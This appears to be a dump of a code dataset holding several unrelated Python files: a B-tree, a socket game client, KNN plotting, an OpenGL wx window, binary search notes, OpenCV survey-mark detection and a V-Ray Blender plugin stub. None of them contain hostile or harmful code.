pointers\r\n self.leaf = leaf #tracks if node is the same as leaf\r\n self.num = 0 #number of keys\r\n\r\n #Function that returns index of key in b tree\r\n def findKey(self, key):\r\n i = 0\r\n while i < self.num and self.keys[i] < key:\r\n i += 1\r\n\r\n return i\r\n \r\n #Function to remove a key from tree\r\n def remove(self, key):\r\n i = self.findKey(key)\r\n\r\n if i < self.num and self.keys[i] == key:\r\n if self.leaf:\r\n self.removeFromLeaf(i)\r\n else:\r\n self.removeFromNonLeaf(i)\r\n\r\n else:\r\n if self.leaf: \r\n print(\"Key not in tree\")\r\n return\r\n\r\n #checks if subtree contains key to be removed\r\n if i == self.num:\r\n containsKey = True\r\n else:\r\n containsKey = False\r\n\r\n #if child where key is present has less than two keys, child is filled\r\n if self.children[i].num < 2:\r\n self.fill(i)\r\n\r\n if containsKey and i > self.num:\r\n self.children[i-1].remove(key)\r\n\r\n else:\r\n self.children[i].remove(key)\r\n\r\n return\r\n\r\n #Function to remove a key from a leaf node\r\n def removeFromLeaf(self, i):\r\n #loop shifts all keys after index one position back\r\n for i in range(i+1, self.num, 1):\r\n self.keys[i-1] = self.keys[i]\r\n\r\n self.num -= 1\r\n return\r\n\r\n #Function to remove a key from a non leaf node\r\n def removeFromNonLeaf(self, i):\r\n key = self.keys[i] #get key at index i\r\n\r\n if self.children[i].num >= 2:\r\n pre = self.getPre(i)\r\n self.keys[i] = pre\r\n self.children[i].remove[pre]\r\n\r\n elif self.children[i+1].num >= 2:\r\n suc = self.getSuc(i)\r\n self.keys[i] = suc\r\n self.children[i+1].remove(suc)\r\n\r\n #if both children have less than 2 keys, then merge and remove\r\n else:\r\n self.merge(i)\r\n self.children[i].remove(key)\r\n\r\n return\r\n\r\n #Function to get predecessor of key at index i\r\n def getPre(self, i):\r\n current = self.children[i]\r\n\r\n while not current.leaf:\r\n current = current.children[current.num]\r\n\r\n return current.keys[current.num-1] #return the last key in leaf\r\n\r\n #Function to get successor of key at index i\r\n def getSuc(self, i):\r\n current = self.children[i+1]\r\n\r\n while not current.leaf:\r\n current = current.children[0]\r\n\r\n return current.keys[0] #return the successor\r\n\r\n #Function to fill child at index with less than 1 key\r\n def fill(self, i):\r\n #borrow key from left sibling\r\n if i != 0 and self.children[i-1].num >= 2:\r\n self.takeFromLeft(i)\r\n\r\n #borrow key from right sibling\r\n elif i != self.num and self.children[i+1].num >= 2:\r\n self.takeFromRight(i)\r\n\r\n #merge if left or right child does not have enough keys\r\n else:\r\n if i != self.num:\r\n self.merge(i)\r\n else:\r\n self.merge(i-1)\r\n\r\n return\r\n\r\n #Function to borrow key from left sibling\r\n def takeFromLeft(self, i):\r\n for n in range(self.children[i].num-1, -1, -1):\r\n self.children[i].keys[n+1] = self.children[i].keys[n]\r\n\r\n if not self.children[i].leaf:\r\n for j in range(self.children[i].num, -1, -1):\r\n self.children[i].children[j+1] = self.children[i].children[j]\r\n\r\n self.children[i].keys[0] = self.keys[i-1]\r\n\r\n if not self.children[i].leaf:\r\n self.children[i].children[0] = self.children[i-1].children[self.children[i-1].num]\r\n\r\n self.keys[i-1] = self.children[i-1].keys[self.children[i-1].num-1]\r\n\r\n self.children[i].num += 1\r\n self.children[i-1].num -= 1\r\n\r\n return\r\n \r\n #Function to borrow key from right sibling\r\n def takeFromRight(self, i):\r\n self.children[i].keys[self.children[i].num] = self.keys[i]\r\n\r\n if not self.children[i].leaf:\r\n self.children[i].children[self.children[i].num+1] = self.children[i+1].children[0]\r\n\r\n self.keys[i] = self.children[i+1].keys[0]\r\n\r\n for n in range(1,self.children[i+1].num, 1):\r\n self.children[i+1].keys[n-1] = self.children[i+1].keys[n]\r\n\r\n if not self.children[i+1].leaf:\r\n for j in range(1, self.children[i+1].num+1, 1):\r\n self.children[i+1].children[j-1] = self.children[i+1].children[j]\r\n\r\n self.children[i].num += 1\r\n self.children[i+1].num -= 1\r\n \r\n return\r\n\r\n #Function to merge child with right sibling\r\n def merge(self, i):\r\n self.children[i].keys[1] = self.keys[i]\r\n \r\n #keys are copied from right sibling into current child\r\n for n in range(self.children[i+1].num):\r\n self.children[i].keys[n+2] = self.children[i+1].keys[n]\r\n\r\n #children are copied from right sibling into grandchildren\r\n if not self.children[i].leaf:\r\n for j in range(self.children[i+1].num +1):\r\n self.children[i].children[j+2] = self.children[i+1].children[j]\r\n \r\n #keys that come after index are shifted one position back\r\n for k in range(i+1, self.num + 1, 1):\r\n self.keys[k-1] = self.keys[k]\r\n\r\n #child pointers are moved one position back\r\n for m in range(i+2, self.num + 1, 1):\r\n self.children[m-1] = self.children[m]\r\n \r\n #key counts are updated\r\n self.children[i].num += self.children[i+1].num + 1\r\n self.num -= 1\r\n \r\n #right sibling is deleted\r\n del self.children[i+1]\r\n \r\n return\r\n\r\n #Function to insert a key into current node when it has vacancy\r\n def insertVacant(self, key):\r\n i = self.num-1 \r\n\r\n #if it is a leaf node, find location to insert key\r\n if self.leaf:\r\n while i >= 0 and self.keys[i] > key:\r\n self.keys[i+1] = self.keys[i]\r\n i -= 1\r\n\r\n #key is inserted and count is updated\r\n self.keys[i+1] = key\r\n self.num += 1\r\n\r\n else:\r\n while i >= 0 and self.keys[i] > key:\r\n i -= 1\r\n\r\n #split child if full\r\n if self.children[i+1].num == 3: \r\n self.split(i+1, self.children[i+1]) \r\n \r\n if self.keys[i+1] < key:\r\n i += 1\r\n\r\n #insert key into vacant child\r\n self.children[i+1].insertVacant(key)\r\n\r\n #Function to split child of a node that is full\r\n def split(self, i, node):\r\n z = Node(node.leaf)\r\n z.num = 1\r\n\r\n for i in range(1):\r\n z.keys[i] = node.keys[i+2]\r\n \r\n if not node.leaf:\r\n for j in range(2):\r\n z.children[j] = node.children[j+2]\r\n \r\n node.num = 1\r\n \r\n #create space for new child\r\n for k in range(self.num, i, -1):\r\n self.children[k+1] = self.children[k]\r\n \r\n self.children[i+1] = z\r\n \r\n for m in range(self.num-1, i-1, -1):\r\n self.keys[m+1] = self.keys[m]\r\n\r\n self.keys[i] = node.keys[1]\r\n self.num += 1\r\n \r\n #Function to traverse the tree\r\n def traverse(self):\r\n for i in range(self.num):\r\n if self.leaf == False:\r\n self.children[i].traverse()\r\n\r\n #parent is printed\r\n print(self.keys[i]) \r\n i+=1\r\n \r\n if self.leaf == False:\r\n self.children[i].traverse()\r\n\r\n#B tree class\r\nclass B_Tree:\r\n def __init__(self): \r\n self.root = None\r\n \r\n #Function to insert \r\n def insert(self, key):\r\n if self.root is None: #if tree is empty\r\n self.root = Node(True) #create new b tree leaf node\r\n self.root.keys[0] = key #insert value into first position\r\n self.root.num = 1 #key count is updated\r\n \r\n else: #if tree is not empty\r\n if self.root.num == 3: #if root is full\r\n new = Node(False) #create a new node\r\n new.children[0] = self.root \r\n new.split(0, self.root) \r\n\r\n i = 0\r\n \r\n if new.keys[0] < key:\r\n i += 1\r\n \r\n new.children[i].insertVacant(key) #new value is inserted into child\r\n self.root = new #root is set to new node\r\n \r\n else: #if root is not full \r\n self.root.insertVacant(key)\r\n\r\n #Function to delete\r\n def delete(self, key):\r\n self.root.remove(key)\r\n\r\n if self.root.num == 0:\r\n #temp = self.root\r\n \r\n if(self.root.leaf):\r\n self.root = None\r\n \r\n else:\r\n self.root = self.root.children[0]\r\n \r\n #del temp #free the previous root\r\n \r\n return\r\n\r\n #Function to get number of nodes in tree\r\n def size(self, node):\r\n count = 1\r\n\r\n #base case\r\n if node is None: \r\n return 0\r\n \r\n else:\r\n for i in range(len(node.children)):\r\n if node.children[i] is not None:\r\n count += self.size(node.children[i])\r\n\r\n #count is returned\r\n return count\r\n \r\n #Function to print tree\r\n def printTree(self):\r\n if self.root is not None:\r\n self.root.traverse()\r\n print(\"The size of the b tree is\", self.size(self.root), \"nodes\")\r\n\r\n\r\n#Driver code\r\ntree = B_Tree()\r\ntree.insert(25)\r\ntree.insert(30)\r\ntree.insert(13)\r\ntree.insert(50)\r\ntree.insert(11)\r\ntree.insert(12)\r\ntree.insert(7)\r\ntree.insert(2048)\r\n\r\nprint(\"Tree after populating:\")\r\ntree.printTree()\r\nprint(\"___________________________________________\" + \"\\n\")\r\nprint(\"Tree after deleting 50\")\r\ntree.delete(50)\r\ntree.printTree()\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n","sub_path":"btree.py","file_name":"btree.py","file_ext":"py","file_size_in_byte":10765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177645745","text":"import sys\r\nimport os\r\nimport socket\r\n\r\nif __name__ == \"__main__\":\r\n HOST = input('Digite o endereço do Servidor:')\r\n PORT = input('Digite a porta do Servidor:')\r\n BUFSIZ = 4096\r\n ADDR = (HOST,int(PORT))\r\n\r\n \r\n\r\n\r\n nome = input(\"digite seu nome\\n\")\r\n opt = \" \"\r\n os.system(\"clear\")\r\n while(opt != \"SAIR\"):\r\n opt = input(\"[RANKING]\\n[JOGAR]\\n[SAIR]\\n\")\r\n if(opt.upper() == \"JOGAR\"):\r\n opt=\"\"\r\n os.system(\"clear\")\r\n while(opt == \"\"):\r\n \r\n opt=input(\"[ENTER]-jogar\\n[Tecla+ENTER] - sair\\n\")\r\n if(opt != \"\"):\r\n break\r\n os.system(\"clear\")\r\n client_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n client_sock.connect(ADDR)\r\n dados = \"nome:{}\".format(nome)\r\n client_sock.send(dados.encode('utf-8'))\r\n resposta = client_sock.recv(BUFSIZ)\r\n resposta = resposta.decode('utf-8')\r\n print(resposta)\r\n client_sock.close()\r\n \r\n \r\n\r\n elif(opt.upper()==\"SAIR\"):\r\n os.system(\"clear\")\r\n sys.exit()\r\n elif(opt.upper() == \"RANKING\"):\r\n os.system(\"clear\")\r\n\r\n client_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n client_sock.connect(ADDR)\r\n dados = \"ranking\".encode('utf-8')\r\n client_sock.send(dados)\r\n resposta = client_sock.recv(BUFSIZ)\r\n resposta = resposta.decode('utf-8')\r\n print(resposta)\r\n client_sock.close()\r\n\r\n \r\n","sub_path":"cliente/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"564386747","text":"from operator import itemgetter\n\nuser = [\n\t{\"fname\" : \"Priyadharshan\", \"lname\" : \"Ravi\"},\n\t{\"fname\" : \"Vijay\", \"lname\" : \"Kuber\"},\n\t{\"fname\" : \"Dinesh\", \"lname\" : \"Sankaran\"},\n\t{\"fname\" : \"Harsha\", \"lname\" : \"Gunaseelan\"},\n\t{\"fname\" : \"Archana\", \"lname\" : \"Surulichamy\"},\n\t{\"fname\" : \"Saravanan\", \"lname\" : \"Ravi\"},\n\t{\"fname\" : \"Archana\", \"lname\" : \"Subramanyam\"}\n]\n\nfor x in sorted(user, key = itemgetter('fname')):\n\tprint(x)\n\nprint(\"_________________________\\n\")\n\nfor x in sorted(user, key = itemgetter(\"fname\", \"lname\")):\n\tprint(x)\t","sub_path":"heap/dict_multi_keysort.py","file_name":"dict_multi_keysort.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"278384318","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import style, cm\nfrom classes.KNN import KNN\nfrom matplotlib.colors import ListedColormap\nimport matplotlib.patches as mpatches\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n# Preparing learning data set.\ndf = pd.read_csv('data.txt', header=None)\ny = df.iloc[0:100, 4].values\ny = np.where(y == 'Iris-setosa', -1, 1)\nX = df.iloc[0:100, [0,2]].values\n\n# Preparing classifier class\nknn = KNN(k=13).fit(X, y)\n\n# Initializing charts surface\nstyle.use('fivethirtyeight')\nfig, ax = plt.subplots(nrows=1, ncols=2, figsize=(8,4))\n\n# Rendering decision regions chart\nresolution=0.01\nmarkers = ('o', 'x')\ncmap = ListedColormap(['red', 'blue'])\n\nx1_min, x1_max = X[:, 0].min() -1, X[:, 0].max() + 1\nx2_min, x2_max = X[:, 1].min() -1, X[:, 1].max() + 1\nxx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\\\n np.arange(x2_min, x2_max, resolution))\n\nZ = knn.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\nZ = Z.reshape(xx1.shape)\n\nax[0].contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\nax[0].set_xlim(xx1.min(), xx1.max())\nax[0].set_ylim(xx2.min(), xx2.max())\n\nfor idx, cl in enumerate(np.unique(y)):\n ax[0].scatter(x=X[y == cl, 0], y=X[y == cl,1],\\\n alpha=0.8, c=cmap(idx),\\\n marker=markers[idx],\\\n label= np.where(cl == 1, 'Versicolor', 'Setosa'))\n\nax[0].set_xlabel('Sepal length [cm]')\nax[0].set_ylabel('Petal length [cm]')\nax[0].legend(loc='upper left')\nax[0].set_title('Decision regions')\n\n# Rendering prediction confidence\nAC = knn.confidence(np.array([xx1.ravel(), xx2.ravel()]).T)\nAC = AC.reshape(xx1.shape)\n\nct = ax[1].contourf(xx1, xx2, AC, 50, cmap=cm.RdYlGn)\nax[1].set_xlim(xx1.min(), xx1.max())\nax[1].set_ylim(xx2.min(), xx2.max())\nax[1].set_xlabel('Sepal length [cm]')\nax[1].set_ylabel('Petal length [cm]')\nax[1].set_title('Prediction confidence')\n\ndivider = make_axes_locatable(ax[1])\ncax = divider.append_axes('right', size='5%', pad=0.05)\nclb = fig.colorbar(ct, cax=cax, orientation='vertical')\nclb.ax.set_title('%')\n\nplt.show()\n\n","sub_path":"classification/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"17492396","text":"\n\nfrom xai.brain.wordbase.adjectives._imperfect import _IMPERFECT\n\n#calss header\nclass _IMPERFECTS(_IMPERFECT, ):\n\tdef __init__(self,): \n\t\t_IMPERFECT.__init__(self)\n\t\tself.name = \"IMPERFECTS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"imperfect\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_imperfects.py","file_name":"_imperfects.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534699332","text":"from OpenGL.GL import *\nfrom wx import glcanvas\nfrom wx import *\n\nclass GLSubWindow(Frame):\n def __init__(self, parent, title, gllock, size = DefaultSize):\n super(GLSubWindow, self).__init__(parent, size = size)\n\n # OpenGL mutex lock\n self.gllock = gllock\n\n # OpenGL canvas\n self.canvas = glcanvas.GLCanvas(self, attribList = (\n glcanvas.WX_GL_RGBA,\n glcanvas.WX_GL_DOUBLEBUFFER,\n glcanvas.WX_GL_DEPTH_SIZE,\n 0\n ), size = size)\n # No GL context for now. Must be created after window is shown\n self.context = None\n\n # Binds\n # Close bypass\n self.Bind(EVT_CLOSE, self.onClose)\n # GL canvas binds\n self.canvas.Bind(EVT_PAINT, self.onPaint)\n self.canvas.Bind(EVT_SIZE, self.onResize)\n\n # Set title\n self.SetTitle(title)\n\n # Set minimum size\n self.SetMinSize(self.GetSize())\n\n # Save size\n self.canvasSize = self.canvas.GetClientSize()\n\n def makeContext(self):\n self.context = glcanvas.GLContext(self.canvas)\n\n def onClose(self, event):\n # Don't close the GL window, just hide it instead. The parent window\n # does the cleanup, not this, so this instance is only destroyed when\n # the parent window is destroyed. This is done automatically\n self.Hide()\n\n def onPaint(self, event):\n #self.gllock.acquire()\n # Tell wxPython that we are drawing while processing this event\n PaintDC(self.canvas)\n # Use the viewer's GL context\n self.canvas.SetCurrent(self.context)\n # Redraw canvas. This must be defined by the daughter class\n self.redrawCanvas()\n # Swap buffers to display\n glFinish()\n self.canvas.SwapBuffers()\n #self.gllock.release()\n # Run default handler aswell\n event.Skip()\n\n def onResize(self, event):\n CallAfter(self.doResizeEvent)\n # Run default handler aswell\n event.Skip()\n\n def doResizeEvent(self):\n # Get new memory viewer size\n self.canvasSize = self.canvas.GetClientSize()\n # Use the viewer's GL context\n #self.gllock.acquire()\n self.canvas.SetCurrent(self.context)\n # Use new size and update orthographic projection\n self.updateOrtho()\n # Resize canvas. This must be defined by the daughter class\n self.resizeCanvas()\n glFinish()\n #self.gllock.release()\n\n def updateOrtho(self):\n # Use orthographic projection\n glViewport(0, 0, self.canvasSize.width, self.canvasSize.height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(0, self.canvasSize.width, self.canvasSize.height, 0, -1, 1)\n glMatrixMode(GL_MODELVIEW)\n\n def redrawCanvas(self):\n raise NotImplementedError\n\n def resizeCanvas(self):\n raise NotImplementedError\n","sub_path":"glsubwindow.py","file_name":"glsubwindow.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"9342074","text":"def binary_search(elements, item):\n low = 0\n high = len(elements) - 1\n\n while low <= high:\n mid = int((low + high) / 2)\n guess = elements[mid]\n\n if guess == item:\n return mid\n if guess > item:\n high = mid - 1\n else:\n low = mid + 1\n\n return None\n\n\nelements = list(range(1, 101))\n\nprint(binary_search(elements, 505))\n\n# EXERCISES\n\n# 1.1 Suppose you have a sorted list of 128 names, and you’re searching through it using binary search.\n# What’s the maximum number of steps it would take?\n\n# ANSWER: log128 = 7, because 2^7 = 128\n\n# 1.2 Suppose you double the size of the list.\n# What’s the maximum number of steps now?\n\n# ANSWER: log256 = 8, because 2^8 = 256\n\n# Give the run time for each of these scenarios in terms of Big O.\n# 1.3 You have a name, and you want to find the person’s phone number in the phone book.\n# ANSWER: O(log n)\n\n# 1.4 You have a phone number, and you want to find the person’s name in the phone book.\n# (Hint: You’ll have to search through the whole book!)\n# ANSWER: O(n)\n\n# 1.5 You want to read the numbers of every person in the phone book.\n# ANSWER: O(n)\n\n# 1.6 You want to read the numbers of just the As.\n# (This is a tricky one! It involves concepts that are covered more in chapter 4.\n# Read the answer—you may be surprised!)\n# ANSWER: Don't know this yet.\n\n\n# Theory time\n\n# If a list has 1000 elements it would take 1000 guesses to find an element in worst case.\n# So whenever we have number of maximum guesses and the size of array equal we call that LINEAR TIME. O(n)\n\n# Binary search is different because it runs in LOGARITHMIC TIME, which means for an array that has 100\n# elements maximum number of guesses in the worst case is 7. O(log n)\n\n# Big O is the special notation that tells us how fast an algorithm is.\n\n# O(n) - n stands for number of operations.\n\n\n\n\n\n","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"551455175","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 23 21:34:10 2018\r\n\r\n@author: kSwoboda\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport math\r\n#import multiprocessing\r\n\r\ndef CaptureFrame (name):\r\n V_list = []\r\n IsCaptured = 0\r\n \r\n #Choosing source of input\r\n \r\n #cap = cv2.VideoCapture(0)\r\n \r\n cap = cv2.VideoCapture(name); \r\n i = -1\r\n lista =[]\r\n while(True):\r\n czekaj = 0 \r\n\r\n i=i+1\r\n # skoro chcecie kazda ramke\r\n # if not(i % 5): \r\n ret, frame = cap.read()\r\n if ret == 1 :\r\n \r\n #Converting image to HSV\r\n frame_HSV = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n V = np.mean(frame_HSV[:,:,2])\r\n\r\n #Aggregating V-values\r\n V_list.append(V)\r\n if IsCaptured == 0 and V>90 and i>10 and np.sum(np.square(V - V_list[-10:-2]))<1:\r\n while(czekaj<10):\r\n ret, frame = cap.read()\r\n czekaj = czekaj +1\r\n lista.append(frame)\r\n V_list.clear\r\n IsCaptured = 1\r\n if IsCaptured == 1 and V < 10:\r\n IsCaptured = 0\r\n else:\r\n break\r\n \r\n #plt.plot(V_list)\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n return lista\r\n\r\n#Ta funkcja dostaje ramkę i progi \r\ndef fixture (img, low, up):\r\n I=img\r\n imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n ret,thresh = cv2.threshold(imgray,low,up,0)\r\n kernel = np.ones((9,9),np.uint8)\r\n img_open = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\r\n img_close = cv2.morphologyEx(img_open, cv2.MORPH_CLOSE, kernel)\r\n im2, contours, hierarchy = cv2.findContours(img_close,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n areat = 0\r\n for i in range (0,len(contours)): \r\n area = cv2.contourArea(contours[i])\r\n if(area> areat):\r\n areat = area\r\n cnt = contours[i]\r\n \r\n rect = cv2.minAreaRect(cnt)\r\n box = cv2.boxPoints(rect)\r\n box = np.int0(box)\r\n cv2.drawContours(I,[box],0,(0,0,255),2)\r\n\r\n #Tu licze kat o jaki to jest przesuniete , ale dosyc chujowo , trzeba to sprawdzic\r\n x =( box[ 0, 0] - box [1, 0])/(box[0,1]-box[1,1])\r\n kat = math.atan(x)\r\n kat = kat* 57.29577951308\r\n \r\n rows = I.shape[0]\r\n cols = I.shape[1]\r\n M = cv2.getRotationMatrix2D((cols/2,rows/2),-kat,1)\r\n I = cv2.warpAffine(I,M,(cols,rows))\r\n\r\n X= (box[ 0, 0] + box [1, 0])/2\r\n Y= (box[1,1]+box[2,1])/2\r\n X2= (box[2,0]+box[3,0])/2 \r\n Y2= (box[0,1]+box[3,1])/2\r\n\r\n newim = np.zeros([ np.int(Y2-Y), np.int(X2-X),3])\r\n\r\n for i in range(0, np.int(Y2-Y)):\r\n for j in range(0, np.int(X2-X)):\r\n if(i<10 or j<10 or j>X2-X-10 or i>Y2-Y-10):\r\n newim[i,j] = 255\r\n else:\r\n newim[i,j]=I[i+np.int(Y),j+np.int(X)]\r\n \r\n return newim\r\n\r\n# tu dodatkowo wejdzie : template i to trzeba dopisać , ale na razie sam się liczy \r\ndef find_templates (img_gray, edge_min, edge_max, template_treshold): # tu dodatkowo wejdzie : template\r\n# przykładowe parametry: edge_min = 100 , edge_max = 200, template_treshold = 0,5\r\n# funkcja zwraca unikatową listę wykryć wzoru \r\n\r\n edges = cv2.Canny(img_gray,edge_min,edge_max)\r\n img_gray = np.uint8(edges)\r\n\r\n# tu jest liczony wycinek dodetekcji, nie będzie to robione tu, tylko ze wzoru( TO DO)\r\n template = np.zeros([ 14, 14])\r\n for i in range(287, 301):\r\n for j in range(124, 138):\r\n template[i-287,j-124] = edges[i][j]\r\n template = np.uint8(template)\r\n#koniec tej częsci, którą trzeba kiedy zmienić\r\n w, h = template.shape[::-1]\r\n \r\n#Znajduje template w obrazie:\r\n res = cv2.matchTemplate(img_gray,template,cv2.TM_CCOEFF_NORMED)\r\n\r\n# Od tego momentu nastąpi kilka dziwnych operacji, ponieważ te template się czasem dublują \r\n loc_repeat = np.where( res >= template_treshold)\r\n loc_trans = []\r\n for i in range (0, len(loc_repeat[1])):\r\n loc_trans.append((loc_repeat[0][i],loc_repeat[1][i],(loc_repeat[0][i]+loc_repeat[1][i])))\r\n\r\n from operator import itemgetter\r\n loc_repeat=sorted(loc_trans,key=itemgetter(2))\r\n\r\n loc = []\r\n loc.append([loc_repeat[0][0],loc_repeat[0][1]])\r\n for i in range (1, len(loc_repeat)):\r\n dist = np.abs(loc_repeat[i][1] - loc_repeat[i-1][1]) + np.abs(loc_repeat[i][0] - loc_repeat[i-1][0])\r\n if(dist>10):\r\n loc.append([loc_repeat[i][0],loc_repeat[i][1]])\r\n#loc zawiera już unikatowe template\r\n return loc\r\n\r\ndef find_contours_in_templates (loc,img, template_width, template_height, tresh_lowerB, tresh_upperB, cont_min, cont_max):\r\n# przykładowe parametry: template_ width = 14, template_height = 14, tresh_upperB = 255, tresh_lowerB = 30, cont_min = 40, cont_max = 80\r\n#poza tym , że funkcja przyjmuje w pizdu parametrów, to zwraca liste konturów, które nas obchodzą\r\n \r\n \r\n#preprocessing obrazu\r\n img = cv2.cvtColor(np.uint8(img), cv2.COLOR_BGR2GRAY)\r\n cv2.equalizeHist( img, img );\r\n ret,img = cv2.threshold(img,tresh_lowerB,tresh_upperB,0)\r\n kernel = np.ones((1,1),np.uint8)\r\n img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\r\n \r\n im2, contours, hierarchy = cv2.findContours(img,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n#wybranie odpowiedniej wielkosci konturow\r\n cnt = []\r\n for i in range (0,len(contours)): \r\n area = cv2.contourArea(contours[i])\r\n if((area> cont_min) & (area= loc[i][1]) & (cnt_sorted[c][0][0][0]<= (loc[i][1] +template_width)) & (cnt_sorted[c][0][0][1]>= loc[i][0]) & (cnt_sorted[c][0][0][1]<= (loc[i][0] +template_height))))\r\n if(war):\r\n cnt_ok.append(cnt_sorted[c])\r\n break\r\n \r\n return cnt_ok\r\n\r\ndef find_marks (img_gray, loc, cnt_ok,template_width, template_height, brightness_tresh):\r\n#przykładowe parametry: template_width = 14, template_height =14, brightness_tresh =120\r\n#funkcja zwraca listę punktów z wynikiem i jasnoscią\r\n \r\n#tworzę maskę obrazu z zaznaczonymi polami\r\n mask = np.zeros([ img_gray.shape[0], img_gray.shape[1]]) \r\n mask = np.uint8(mask)\r\n mask= cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR) \r\n cv2.drawContours(mask, cnt_ok, -1, (255,255,255), -1)\r\n mask= cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY) \r\n\r\n wypelnienie = []\r\n for i in range (0, len(loc)):\r\n jasnosc = 0\r\n out = 0 \r\n n = 0\r\n for j in range (loc[i][0],loc[i][0]+ template_width):\r\n for k in range (loc[i][1],loc[i][1]+ template_height):\r\n if(mask[j,k] > 1):\r\n jasnosc = jasnosc + img_gray[j,k]\r\n n= n+1\r\n if(n!=0):\r\n jasnosc = jasnosc /n\r\n if ( jasnosc < brightness_tresh):\r\n out = 1\r\n wypelnienie.append([out, jasnosc,[loc[i][0],loc[i][1]]])\r\n \r\n return wypelnienie\r\n\r\n\r\n#ta funkcja wywołuje reszte, okre \r\ndef funkcja_test(nazwa):\r\n I=CaptureFrame(nazwa)\r\n I=I[0]\r\n img = fixture (I, 20, 255)\r\n cv2.imshow(\"Wycieta ankieta\", np.uint8(img))\r\n img_gray = cv2.cvtColor(np.uint8(img), cv2.COLOR_BGR2GRAY)\r\n \r\n #wielkosc wycinka\r\n w = 14\r\n h = 14\r\n \r\n loc = []\r\n loc = find_templates (img_gray, 100, 200, 0.5)\r\n cnt = []\r\n cnt = find_contours_in_templates (loc,img, w,h, 30, 255, 40, 80)\r\n wynik = []\r\n wynik = find_marks (img_gray, loc, cnt, w,h, 120)\r\n for i in range (0, len(loc)):\r\n pt = (loc[i][1], loc[i][0])\r\n \r\n if(wynik[i][0]):\r\n cv2.rectangle(img, pt, (pt[0] + w, pt[1] + h), (0,255,0), 1)\r\n else:\r\n cv2.rectangle(img, pt, (pt[0] + w, pt[1] + h), (0,0,255), 1)\r\n \r\n cv2.drawContours(img, cnt, -1, (255,255,255), 1)\r\n cv2.imshow('wynik',np.uint8(img))\r\n cv2.waitKey(10)\r\n \r\n\r\n#wywolanie funkcji:\r\nfunkcja_test(\"C:\\\\Users\\kSwoboda\\\\Desktop\\\\ankieter\\\\Pollster-master\\\\ICK_ankieter\\\\ankieta_OK.avi\")\r\n\r\n \r\n ","sub_path":"kswoboda_wykrywanie zaznaczen.py","file_name":"kswoboda_wykrywanie zaznaczen.py","file_ext":"py","file_size_in_byte":8306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"539414107","text":"#\n# V-Ray For Blender\n#\n# http://chaosgroup.com\n#\n# Author: Andrei Izrantcev\n# E-Mail: andrei.izrantcev@chaosgroup.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n# All Rights Reserved. V-Ray(R) is a registered trademark of Chaos Software.\n#\n\nimport bpy\n\nfrom vb30.lib import ExportUtils\n\n\nTYPE = 'BRDF'\nID = 'BRDFLight'\nNAME = 'Light'\nDESC = \"\"\n\nPluginParams = (\n {\n 'attr' : 'color',\n 'desc' : \"The self-illumination color\",\n 'type' : 'TEXTURE',\n 'default' : (1.0, 1.0, 1.0),\n },\n {\n 'attr' : 'colorMultiplier',\n 'desc' : \"Color Multiplier\",\n 'type' : 'FLOAT_TEXTURE',\n 'default' : 1,\n },\n {\n 'attr' : 'transparency',\n 'desc' : \"Transparency of the BRDF\",\n 'type' : 'TEXTURE',\n 'default' : (0.0, 0.0, 0.0),\n },\n {\n 'attr' : 'doubleSided',\n 'desc' : \"If false, the light color is black for back-facing surfaces\",\n 'type' : 'BOOL',\n 'default' : False,\n },\n {\n 'attr' : 'emitOnBackSide',\n 'desc' : \"Emit on back side\",\n 'type' : 'BOOL',\n 'default' : True,\n },\n {\n 'attr' : 'channels',\n 'desc' : \"Render channels the result of this BRDF will be written to\",\n 'type' : 'PLUGIN',\n 'default' : \"\",\n },\n {\n 'attr' : 'compensateExposure',\n 'desc' : 